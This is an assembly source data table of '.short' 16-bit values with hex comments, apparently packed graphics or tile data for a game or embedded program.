.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 19971 ; 0x4e03
.short 846 ; 0x34e
.short 19278 ; 0x4b4e
.short 19015 ; 0x4a47
.short 19971 ; 0x4e03
.short 55811 ; 0xda03
.short 19715 ; 0x4d03
.short 19783 ; 0x4d47
.short 986 ; 0x3da
.short 56026 ; 0xdada
.short 19971 ; 0x4e03
.short 20045 ; 0x4e4d
.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 19971 ; 0x4e03
.short 19971 ; 0x4e03
.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 986 ; 0x3da
.short 986 ; 0x3da
.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 986 ; 0x3da
.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 986 ; 0x3da
.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 19971 ; 0x4e03
.short 256 ; 0x100
.short 771 ; 0x303
.short 771 ; 0x303
.short 771 ; 0x303
.short 769 ; 0x301
.short 52380 ; 0xcc9c
.short 52428 ; 0xcccc
.short 39884 ; 0x9bcc
.short 39937 ; 0x9c01
.short 41377 ; 0xa1a1
.short 41377 ; 0xa1a1
.short 34952 ; 0x8888
.short 34305 ; 0x8601
.short 25443 ; 0x6363
.short 25443 ; 0x6363
.short 34912 ; 0x8860
.short 39681 ; 0x9b01
.short 24737 ; 0x60a1
.short 25440 ; 0x6360
.short 25443 ; 0x6363
.short 39681 ; 0x9b01
.short 34977 ; 0x88a1
.short 24712 ; 0x6088
.short 24672 ; 0x6060
.short 34305 ; 0x8601
.short 25443 ; 0x6363
.short 41315 ; 0xa163
.short 24712 ; 0x6088
.short 39681 ; 0x9b01
.short 24737 ; 0x60a1
.short 25443 ; 0x6363
.short 34977 ; 0x88a1
.short 771 ; 0x303
.short 771 ; 0x303
.short 771 ; 0x303
.short 771 ; 0x303
.short 39835 ; 0x9b9b
.short 52428 ; 0xcccc
.short 52428 ; 0xcccc
.short 39884 ; 0x9bcc
.short 34977 ; 0x88a1
.short 24672 ; 0x6060
.short 41312 ; 0xa160
.short 34977 ; 0x88a1
.short 41377 ; 0xa1a1
.short 24737 ; 0x60a1
.short 25443 ; 0x6363
.short 41315 ; 0xa163
.short 41315 ; 0xa163
.short 41377 ; 0xa1a1
.short 24672 ; 0x6060
.short 25443 ; 0x6363
.short 25443 ; 0x6363
.short 41377 ; 0xa1a1
.short 34952 ; 0x8888
.short 24672 ; 0x6060
.short 25440 ; 0x6360
.short 41315 ; 0xa163
.short 34977 ; 0x88a1
.short 24712 ; 0x6088
.short 24672 ; 0x6060
.short 25443 ; 0x6363
.short 41377 ; 0xa1a1
.short 34952 ; 0x8888
.short 771 ; 0x303
.short 771 ; 0x303
.short 771 ; 0x303
.short 771 ; 0x303
.short 39835 ; 0x9b9b
.short 52428 ; 0xcccc
.short 52428 ; 0xcccc
.short 39884 ; 0x9bcc
.short 34977 ; 0x88a1
.short 24672 ; 0x6060
.short 41312 ; 0xa160
.short 34977 ; 0x88a1
.short 41377 ; 0xa1a1
.short 24737 ; 0x60a1
.short 25443 ; 0x6363
.short 41315 ; 0xa163
.short 41315 ; 0xa163
.short 41377 ; 0xa1a1
.short 24672 ; 0x6060
.short 25443 ; 0x6363
.short 25443 ; 0x6363
.short 41377 ; 0xa1a1
.short 34952 ; 0x8888
.short 24672 ; 0x6060
.short 25440 ; 0x6360
.short 41315 ; 0xa163
.short 34977 ; 0x88a1
.short 24712 ; 0x6088
.short 24672 ; 0x6060
.short 25443 ; 0x6363
.short 41377 ; 0xa1a1
.short 34952 ; 0x8888
.short 771 ; 0x303
.short 771 ; 0x303
.short 771 ; 0x303
.short 771 ; 0x303
.short 39835 ; 0x9b9b
.short 52428 ; 0xcccc
.short 52428 ; 0xcccc
.short 39884 ; 0x9bcc
.short 34977 ; 0x88a1
.short 24672 ; 0x6060
.short 41312 ; 0xa160
.short 34977 ; 0x88a1
.short 41377 ; 0xa1a1
.short 24737 ; 0x60a1
.short 25443 ; 0x6363
.short 41315 ; 0xa163
.short 41315 ; 0xa163
.short 41377 ; 0xa1a1
.short 24672 ; 0x6060
.short 25443 ; 0x6363
.short 25443 ; 0x6363
.short 41377 ; 0xa1a1
.short 34952 ; 0x8888
.short 24672 ; 0x6060
.short 25440 ; 0x6360
.short 41315 ; 0xa163
.short 34977 ; 0x88a1
.short 24712 ; 0x6088
.short 24672 ; 0x6060
.short 25443 ; 0x6363
.short 41377 ; 0xa1a1
.short 34952 ; 0x8888
.short 769 ; 0x301
.short 771 ; 0x303
.short 771 ; 0x303
.short 771 ; 0x303
.short 39772 ; 0x9b5c
.short 52428 ; 0xcccc
.short 52428 ; 0xcccc
.short 39884 ; 0x9bcc
.short 34917 ; 0x8865
.short 24672 ; 0x6060
.short 41312 ; 0xa160
.short 34977 ; 0x88a1
.short 41317 ; 0xa165
.short 24737 ; 0x60a1
.short 25443 ; 0x6363
.short 41315 ; 0xa163
.short 41229 ; 0xa10d
.short 41377 ; 0xa1a1
.short 24672 ; 0x6060
.short 25443 ; 0x6363
.short 25357 ; 0x630d
.short 41377 ; 0xa1a1
.short 34952 ; 0x8888
.short 24672 ; 0x6060
.short 25365 ; 0x6315
.short 41315 ; 0xa163
.short 34977 ; 0x88a1
.short 24712 ; 0x6088
.short 24597 ; 0x6015
.short 25443 ; 0x6363
.short 41377 ; 0xa1a1
.short 34952 ; 0x8888
.short 771 ; 0x303
.short 771 ; 0x303
.short 771 ; 0x303
.short 1 ; 0x1
.short 39835 ; 0x9b9b
.short 52428 ; 0xcccc
.short 27340 ; 0x6acc
.short 259 ; 0x103
.short 24712 ; 0x6088
.short 25443 ; 0x6363
.short 37216 ; 0x9160
.short 362 ; 0x16a
.short 41352 ; 0xa188
.short 25440 ; 0x6360
.short 24675 ; 0x6063
.short 361 ; 0x169
.short 34915 ; 0x8863
.short 24737 ; 0x60a1
.short 24675 ; 0x6063
.short 873 ; 0x369
.short 41315 ; 0xa163
.short 24712 ; 0x6088
.short 25443 ; 0x6363
.short 873 ; 0x369
.short 25443 ; 0x6363
.short 34977 ; 0x88a1
.short 25440 ; 0x6360
.short 873 ; 0x369
.short 25440 ; 0x6360
.short 34977 ; 0x88a1
.short 25440 ; 0x6360
.short 873 ; 0x369
.short 769 ; 0x301
.short 771 ; 0x303
.short 259 ; 0x103
.short 257 ; 0x101
.short 50459 ; 0xc51b
.short 49858 ; 0xc2c2
.short 49858 ; 0xc2c2
.short 49858 ; 0xc2c2
.short 49691 ; 0xc21b
.short 16416 ; 0x4020
.short 16448 ; 0x4040
.short 8224 ; 0x2020
.short 49691 ; 0xc21b
.short 8264 ; 0x2048
.short 16448 ; 0x4040
.short 8224 ; 0x2020
.short 49691 ; 0xc21b
.short 18625 ; 0x48c1
.short 16416 ; 0x4020
.short 8256 ; 0x2040
.short 49675 ; 0xc20b
.short 49601 ; 0xc1c1
.short 8264 ; 0x2048
.short 8256 ; 0x2040
.short 49691 ; 0xc21b
.short 49626 ; 0xc1da
.short 18625 ; 0x48c1
.short 16416 ; 0x4020
.short 49675 ; 0xc20b
.short 49601 ; 0xc1c1
.short 49626 ; 0xc1da
.short 8264 ; 0x2048
.short 771 ; 0x303
.short 2819 ; 0xb03
.short 2827 ; 0xb0b
.short 779 ; 0x30b
.short 49858 ; 0xc2c2
.short 49858 ; 0xc2c2
.short 49858 ; 0xc2c2
.short 962 ; 0x3c2
.short 8224 ; 0x2020
.short 8224 ; 0x2020
.short 9505 ; 0x2521
.short 962 ; 0x3c2
.short 8224 ; 0x2020
.short 8480 ; 0x2120
.short 6949 ; 0x1b25
.short 962 ; 0x3c2
.short 8224 ; 0x2020
.short 9505 ; 0x2521
.short 6923 ; 0x1b0b
.short 965 ; 0x3c5
.short 8480 ; 0x2120
.short 2853 ; 0xb25
.short 6950 ; 0x1b26
.short 965 ; 0x3c5
.short 9505 ; 0x2521
.short 771 ; 0x303
.short 16139 ; 0x3f0b
.short 962 ; 0x3c2
.short 2852 ; 0xb24
.short 9766 ; 0x2626
.short 2827 ; 0xb0b
.short 965 ; 0x3c5
.short 20043 ; 0x4e4b
.short 55811 ; 0xda03
.short 16858 ; 0x41da
.short 56026 ; 0xdada
.short 19271 ; 0x4b47
.short 846 ; 0x34e
.short 56026 ; 0xdada
.short 55873 ; 0xda41
.short 18247 ; 0x4747
.short 20043 ; 0x4e4b
.short 55811 ; 0xda03
.short 16858 ; 0x41da
.short 18247 ; 0x4747
.short 19783 ; 0x4d47
.short 55811 ; 0xda03
.short 56026 ; 0xdada
.short 18247 ; 0x4747
.short 19271 ; 0x4b47
.short 846 ; 0x34e
.short 771 ; 0x303
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 19787 ; 0x4d4b
.short 20045 ; 0x4e4d
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 19271 ; 0x4b47
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 16858 ; 0x41da
.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 16705 ; 0x4141
.short 55873 ; 0xda41
.short 56026 ; 0xdada
.short 16705 ; 0x4141
.short 56026 ; 0xdada
.short 16705 ; 0x4141
.short 16705 ; 0x4141
.short 16705 ; 0x4141
.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 16705 ; 0x4141
.short 56026 ; 0xdada
.short 55811 ; 0xda03
.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 986 ; 0x3da
.short 846 ; 0x34e
.short 55811 ; 0xda03
.short 56026 ; 0xdada
.short 19971 ; 0x4e03
.short 19787 ; 0x4d4b
.short 846 ; 0x34e
.short 771 ; 0x303
.short 19534 ; 0x4c4e
.short 16858 ; 0x41da
.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 55873 ; 0xda41
.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 16705 ; 0x4141
.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 55873 ; 0xda41
.short 16858 ; 0x41da
.short 16705 ; 0x4141
.short 16705 ; 0x4141
.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 16705 ; 0x4141
.short 55873 ; 0xda41
.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 771 ; 0x303
.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 771 ; 0x303
.short 20045 ; 0x4e4d
.short 771 ; 0x303
.short 771 ; 0x303
.short 19790 ; 0x4d4e
.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 986 ; 0x3da
.short 20046 ; 0x4e4e
.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 19971 ; 0x4e03
.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 986 ; 0x3da
.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 20186 ; 0x4eda
.short 56026 ; 0xdada
.short 56026 ; 0xdada
.short 986 ; 0x3da
.short 19971 ; 0x4e03
.short 55811 ; 0xda03
.short 986 ; 0x3da
.short 19971 ; 0x4e03
.short 20045 ; 0x4e4d
.short 846 ; 0x34e
.short 19971 ; 0x4e03
.short 19277 ; 0x4b4d
.short 19783 ; 0x4d47
.short 19788 ; 0x4d4c
.short 19277 ; 0x4b4d
.short 18247 ; 0x4747
.short 19783 ; 0x4d47
.short 39681 ; 0x9b01
.short 34977 ; 0x88a1
.short 25440 ; 0x6360
.short 41315 ; 0xa163
.short 39681 ; 0x9b01
.short 24737 ; 0x60a1
.short 25440 ; 0x6360
.short 41315 ; 0xa163
.short 39681 ; 0x9b01
.short 25440 ; 0x6360
.short 25443 ; 0x6363
.short 34977 ; 0x88a1
.short 34305 ; 0x8601
.short 25440 ; 0x6360
.short 41312 ; 0xa160
.short 24712 ; 0x6088
.short 34305 ; 0x8601
.short 24712 ; 0x6088
.short 34952 ; 0x8888
.short 24672 ; 0x6060
.short 27137 ; 0x6a01
.short 24673 ; 0x6061
.short 24672 ; 0x6060
.short 25443 ; 0x6363
.short 769 ; 0x301
.short 26986 ; 0x696a
.short 26985 ; 0x6969
.short 26985 ; 0x6969
.short 256 ; 0x100
.short 771 ; 0x303
.short 771 ; 0x303
.short 771 ; 0x303
.short 24712 ; 0x6088
.short 25440 ; 0x6360
.short 41377 ; 0xa1a1
.short 34952 ; 0x8888
.short 24712 ; 0x6088
.short 25440 ; 0x6360
.short 41377 ; 0xa1a1
.short 34952 ; 0x8888
.short 24672 ; 0x6060
.short 25443 ; 0x6363
.short 41377 ; 0xa1a1
.short 34952 ; 0x8888
.short 24672 ; 0x6060
.short 41315 ; 0xa163
.short 34977 ; 0x88a1
.short 24712 ; 0x6088
.short 25443 ; 0x6363
.short 34915 ; 0x8863
.short 34952 ; 0x8888
.short 24672 ; 0x6060
.short 24675 ; 0x6063
.short 24672 ; 0x6060
.short 25440 ; 0x6360
.short 25443 ; 0x6363
.short 26985 ; 0x6969
.short 26985 ; 0x6969
.short 26985 ; 0x6969
.short 26985 ; 0x6969
.short 771 ; 0x303
.short 771 ; 0x303
.short 771 ; 0x303
.short 259 ; 0x103
.short 24712 ; 0x6088
.short 25440 ; 0x6360
.short 41377 ; 0xa1a1
.short 34952 ; 0x8888
.short 24712 ; 0x6088
.short 25440 ; 0x6360
.short 41377 ; 0xa1a1
.short 34952 ; 0x8888
.short 24672 ; 0x6060
.short 25443 ; 0x6363
.short 41377 ; 0xa1a1
.short 34952 ; 0x8888
.short 24672 ; 0x6060
.short 41315 ; 0xa163
.short 34977 ; 0x88a1
.short 24712 ; 0x6088
.short 25443 ; 0x6363
.short 34915 ; 0x8863
.short 34952 ; 0x8888
.short 24672 ; 0x6060
.short 24675 ; 0x6063
.short 24672 ; 0x6060
.short 25440 ; 0x6360
.short 25443 ; 0x6363
.short 26985 ; 0x6969
.short 26985 ; 0x6969
.short 26985 ; 0x6969
.short 26985 ; 0x6969
.short 257 ; 0x101
.short 771 ; 0x303
.short 259 ; 0x103
.short 257 ; 0x101
.short 24712 ; 0x6088
.short 25440 ; 0x6360
.short 41377 ; 0xa1a1
.short 34952 ; 0x8888
.short 24712 ; 0x6088
.short 25440 ; 0x6360
.short 41377 ; 0xa1a1
.short 34952 ; 0x8888
.short 24672 ; 0x6060
.short 25443 ; 0x6363
.short 41377 ; 0xa1a1
.short 34952 ; 0x8888
.short 24672 ; 0x6060
.short 41315 ; 0xa163
.short 34977 ; 0x88a1
.short 24712 ; 0x6088
.short 25443 ; 0x6363
.short 34915 ; 0x8863
.short 34952 ; 0x8888
.short 24672 ; 0x6060
.short 24675 ; 0x6063
.short 24672 ; 0x6060
.short 25440 ; 0x6360
.short 25443 ; 0x6363
.short 26985 ; 0x6969
.short 26985 ; 0x6969
.short 26985 ; 0x6969
.short 26985 ; 0x6969
.short 257 ; 0x101
.short 771 ; 0x303
.short 259 ; 0x103
.short 257 ; 0x101
.short 24664 ; 0x6058
.short 25440 ; 0x6360
.short 41377 ; 0xa1a1
.short 34952 ; 0x8888
.short 24664 ; 0x6058
.short 25440 ; 0x6360
.short 41377 ; 0xa1a1
.short 34952 ; 0x8888
.short 24597 ; 0x6015
.short 25443 ; 0x6363
.short 41377 ; 0xa1a1
.short 34952 ; 0x8888
.short 24598 ; 0x6016
.short 41315 ; 0xa163
.short 34977 ; 0x88a1
.short 24712 ; 0x6088
.short 25447 ; 0x6367
.short 34915 ; 0x8863
.short 34952 ; 0x8888
.short 24672 ; 0x6060
.short 24681 ; 0x6069
.short 24672 ; 0x6060
.short 25440 ; 0x6360
.short 25443 ; 0x6363
.short 26986 ; 0x696a
.short 26985 ; 0x6969
.short 26985 ; 0x6969
.short 26985 ; 0x6969
.short 771 ; 0x303
.short 771 ; 0x303
.short 771 ; 0x303
.short 771 ; 0x303
.short 25440 ; 0x6360
.short 34977 ; 0x88a1
.short 25440 ; 0x6360
.short 873 ; 0x369
.short 25440 ; 0x6360
.short 34977 ; 0x88a1
.short 25440 ; 0x6360
.short 873 ; 0x369
.short 25443 ; 0x6363
.short 34977 ; 0x88a1
.short 25440 ; 0x6360
.short 873 ; 0x369
.short 41315 ; 0xa163
.short 24712 ; 0x6088
.short 25443 ; 0x6363
.short 873 ; 0x369
.short 34915 ; 0x8863
.short 24712 ; 0x6088
.short 24675 ; 0x6063
.short 873 ; 0x369
.short 24672 ; 0x6060
.short 25440 ; 0x6360
.short 25699 ; 0x6463
.short 874 ; 0x36a
.short 26985 ; 0x6969
.short 26985 ; 0x6969
.short 27241 ; 0x6a69
.short 259 ; 0x103
.short 771 ; 0x303
.short 771 ; 0x303
.short 771 ; 0x303
.short 1 ; 0x1
.short 49675 ; 0xc20b
.short 56001 ; 0xdac1
.short 49601 ; 0xc1c1
.short 56001 ; 0xdac1
.short 49675 ; 0xc20b
.short 49626 ; 0xc1da
.short 49601 ; 0xc1c1
.short 18650 ; 0x48da
.short 49675 ; 0xc20b
.short 49601 ; 0xc1c1
.short 56001 ; 0xdac1
.short 20817 ; 0x5151
.short 49675 ; 0xc20b
.short 49601 ; 0xc1c1
.short 20954 ; 0x51da
.short 20817 ; 0x5151
.short 49667 ; 0xc203
.short 56001 ; 0xdac1
.short 20817 ; 0x5151
.short 20929 ; 0x51c1
.short 49667 ; 0xc203
.short 20954 ; 0x51da
.short 49489 ; 0xc151
.short 20817 ; 0x5151
.short 50435 ; 0xc503
.short 49858 ; 0xc2c2
.short 49858 ; 0xc2c2
.short 49858 ; 0xc2c2
.short 2819 ; 0xb03
.short 2827 ; 0xb0b
.short 771 ; 0x303
.short 771 ; 0x303
.short 850 ; 0x352
.short 9739 ; 0x260b
.short 2854 ; 0xb26
.short 965 ; 0x3c5
.short 21318 ; 0x5346
.short 2819 ; 0xb03
.short 9510 ; 0x2526
.short 962 ; 0x3c2
.short 17992 ; 0x4648
.short 2899 ; 0xb53
.short 9739 ; 0x260b
.short 962 ; 0x3c2
.short 16456 ; 0x4048
.short 21318 ; 0x5346
.short 2827 ; 0xb0b
.short 965 ; 0x3c5
.short 20561 ; 0x5051
.short 17984 ; 0x4640
.short 2899 ; 0xb53
.short 965 ; 0x3c5
.short 20817 ; 0x5151
.short 16448 ; 0x4040
.short 21062 ; 0x5246
.short 962 ; 0x3c2
.short 49858 ; 0xc2c2
.short 49858 ; 0xc2c2
.short 49858 ; 0xc2c2
.short 962 ; 0x3c2
.short 771 ; 0x303
.short 771 ; 0x303
.short 771 ; 0x303
.short 771 ; 0x303
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 19787 ; 0x4d4b
.short 19789 ; 0x4d4d
.short 18251 ; 0x474b
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 18247 ; 0x4747
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 44545 ; 0xae01
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 38145 ; 0x9501
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 769 ; 0x301
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 44801 ; 0xaf01
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 44545 ; 0xae01
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 38145 ; 0x9501
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 769 ; 0x301
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 44801 ; 0xaf01
.short 405 ; 0x195
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 259 ; 0x103
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 431 ; 0x1af
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 430 ; 0x1ae
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 405 ; 0x195
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 259 ; 0x103
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 431 ; 0x1af
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 430 ; 0x1ae
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 771 ; 0x303
.short 771 ; 0x303
.short 771 ; 0x303
.short 771 ; 0x303
.short 13827 ; 0x3603
.short 31286 ; 0x7a36
.short 13621 ; 0x3535
.short 13178 ; 0x337a
.short 33283 ; 0x8203
.short 51845 ; 0xca85
.short 32900 ; 0x8084
.short 33152 ; 0x8180
.short 15875 ; 0x3e03
.short 55940 ; 0xda84
.short 32388 ; 0x7e84
.short 12158 ; 0x2f7e
.short 15875 ; 0x3e03
.short 55940 ; 0xda84
.short 32388 ; 0x7e84
.short 12158 ; 0x2f7e
.short 15875 ; 0x3e03
.short 55940 ; 0xda84
.short 32388 ; 0x7e84
.short 12158 ; 0x2f7e
.short 32515 ; 0x7f03
.short 55940 ; 0xda84
.short 33668 ; 0x8384
.short 16003 ; 0x3e83
.short 13059 ; 0x3303
.short 45178 ; 0xb07a
.short 13877 ; 0x3635
.short 13110 ; 0x3336
.short 771 ; 0x303
.short 771 ; 0x303
.short 771 ; 0x303
.short 771 ; 0x303
.short 5140 ; 0x1414
.short 4369 ; 0x1111
.short 4369 ; 0x1111
.short 785 ; 0x311
.short 16001 ; 0x3e81
.short 15422 ; 0x3c3e
.short 13107 ; 0x3333
.short 829 ; 0x33d
.short 10799 ; 0x2a2f
.short 12335 ; 0x302f
.short 771 ; 0x303
.short 827 ; 0x33b
.short 10799 ; 0x2a2f
.short 12335 ; 0x302f
.short 771 ; 0x303
.short 827 ; 0x33b
.short 10799 ; 0x2a2f
.short 12335 ; 0x302f
.short 771 ; 0x303
.short 827 ; 0x33b
.short 12350 ; 0x303e
.short 12606 ; 0x313e
.short 771 ; 0x303
.short 827 ; 0x33b
.short 11827 ; 0x2e33
.short 11827 ; 0x2e33
.short 771 ; 0x303
.short 814 ; 0x32e
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 256 ; 0x100
.short 12806 ; 0x3206
.short 12980 ; 0x32b4
.short 1837 ; 0x72d
.short 256 ; 0x100
.short 33840 ; 0x8430
.short 34010 ; 0x84da
.short 12158 ; 0x2f7e
.short 256 ; 0x100
.short 33840 ; 0x8430
.short 34010 ; 0x84da
.short 12158 ; 0x2f7e
.short 256 ; 0x100
.short 33840 ; 0x8430
.short 34010 ; 0x84da
.short 12158 ; 0x2f7e
.short 256 ; 0x100
.short 33840 ; 0x8430
.short 34010 ; 0x84da
.short 12158 ; 0x2f7e
.short 256 ; 0x100
.short 33840 ; 0x8430
.short 34010 ; 0x84da
.short 12158 ; 0x2f7e
.short 256 ; 0x100
.short 33840 ; 0x8430
.short 34010 ; 0x84da
.short 12158 ; 0x2f7e
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 1031 ; 0x407
.short 300 ; 0x12c
.short 2305 ; 0x901
.short 1 ; 0x1
.short 10799 ; 0x2a2f
.short 830 ; 0x33e
.short 15107 ; 0x3b03
.short 1 ; 0x1
.short 10799 ; 0x2a2f
.short 830 ; 0x33e
.short 15107 ; 0x3b03
.short 1 ; 0x1
.short 10799 ; 0x2a2f
.short 830 ; 0x33e
.short 15107 ; 0x3b03
.short 1 ; 0x1
.short 10799 ; 0x2a2f
.short 830 ; 0x33e
.short 15107 ; 0x3b03
.short 1 ; 0x1
.short 10799 ; 0x2a2f
.short 830 ; 0x33e
.short 15107 ; 0x3b03
.short 1 ; 0x1
.short 10799 ; 0x2a2f
.short 830 ; 0x33e
.short 15107 ; 0x3b03
.short 1 ; 0x1
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 0 ; 0x0
.short 256 ; 0x100
.short 12806 ; 0x3206
.short 12980 ; 0x32b4
.short 2093 ; 0x82d
.short 256 ; 0x100
.short 33840 ; 0x8430
.short 34010 ; 0x84da
.short 12158 ; 0x2f7e
.short 256 ; 0x100
.short 33840 ; 0x8430
.short 34010 ; 0x84da
.short 12158 ; 0x2f7e
.short 256 ; 0x100
.short 33840 ; 0x8430
.short 34010 ; 0x84da
.short 12158 ; 0x2f7e
.short 256 ; 0x100
.short 33840 ; 0x8430
.short 34010 ; 0x84da
.short 12158 ; 0x2f7e
.short 256 ; 0x100
.short 33840 ; 0x8430
.short 34010 ; 0x84da
.short 12158 ; 0x2f7e
.short 256 ; 0x100
.short 33841 ; 0x8431
.short 34010 ; 0x84da
.short 16003 ; 0x3e83
.short 11793 ; 0x2e11
.short 819 ; 0x333
.short 11779 ; 0x2e03
.short 1 ; 0x1
.short 12340 ; 0x3034
.short 895 ; 0x37f
.short 15107 ; 0x3b03
.short 1 ; 0x1
.short 10799 ; 0x2a2f
.short 830 ; 0x33e
.short 15107 ; 0x3b03
.short 1 ; 0x1
.short 10799 ; 0x2a2f
.short 830 ; 0x33e
.short 15107 ; 0x3b03
.short 1 ; 0x1
.short 10799 ; 0x2a2f
.short 830 ; 0x33e
.short 15107 ; 0x3b03
.short 1 ; 0x1
.short 10799 ; 0x2a2f
.short 830 ; 0x33e
.short 15107 ; 0x3b03
.short 1 ; 0x1
.short 10799 ; 0x2a2f
.short 830 ; 0x33e
.short 15107 ; 0x3b03
.short 1 ; 0x1
.short 12350 ; 0x303e
.short 895 ; 0x37f
.short 15107 ; 0x3b03
.short 1 ; 0x1
.short 32025 ; 0x7d19
.short 32125 ; 0x7d7d
.short 32125 ; 0x7d7d
.short 32125 ; 0x7d7d
.short 52249 ; 0xcc19
.short 32135 ; 0x7d87
.short 32125 ; 0x7d7d
.short 32125 ; 0x7d7d
.short 41497 ; 0xa219
.short 34721 ; 0x87a1
.short 32125 ; 0x7d7d
.short 32125 ; 0x7d7d
.short 41497 ; 0xa219
.short 41366 ; 0xa196
.short 41634 ; 0xa2a2
.short 41634 ; 0xa2a2
.short 41497 ; 0xa219
.short 38550 ; 0x9696
.short 24158 ; 0x5e5e
.short 24158 ; 0x5e5e
.short 38424 ; 0x9618
.short 38550 ; 0x9696
.short 24158 ; 0x5e5e
.short 24158 ; 0x5e5e
.short 38412 ; 0x960c
.short 38550 ; 0x9696
.short 24158 ; 0x5e5e
.short 24158 ; 0x5e5e
.short 38412 ; 0x960c
.short 38550 ; 0x9696
.short 24158 ; 0x5e5e
.short 24158 ; 0x5e5e
.short 32125 ; 0x7d7d
.short 32125 ; 0x7d7d
.short 32125 ; 0x7d7d
.short 6525 ; 0x197d
.short 32125 ; 0x7d7d
.short 32125 ; 0x7d7d
.short 32125 ; 0x7d7d
.short 23943 ; 0x5d87
.short 32125 ; 0x7d7d
.short 32125 ; 0x7d7d
.short 34685 ; 0x877d
.short 32125 ; 0x7d7d
.short 41634 ; 0xa2a2
.short 41634 ; 0xa2a2
.short 32135 ; 0x7d87
.short 32125 ; 0x7d7d
.short 24158 ; 0x5e5e
.short 24158 ; 0x5e5e
.short 32162 ; 0x7da2
.short 32125 ; 0x7d7d
.short 24158 ; 0x5e5e
.short 24158 ; 0x5e5e
.short 32162 ; 0x7da2
.short 32125 ; 0x7d7d
.short 24158 ; 0x5e5e
.short 24158 ; 0x5e5e
.short 32162 ; 0x7da2
.short 32125 ; 0x7d7d
.short 24158 ; 0x5e5e
.short 24158 ; 0x5e5e
.short 32162 ; 0x7da2
.short 32125 ; 0x7d7d
.short 18247 ; 0x4747
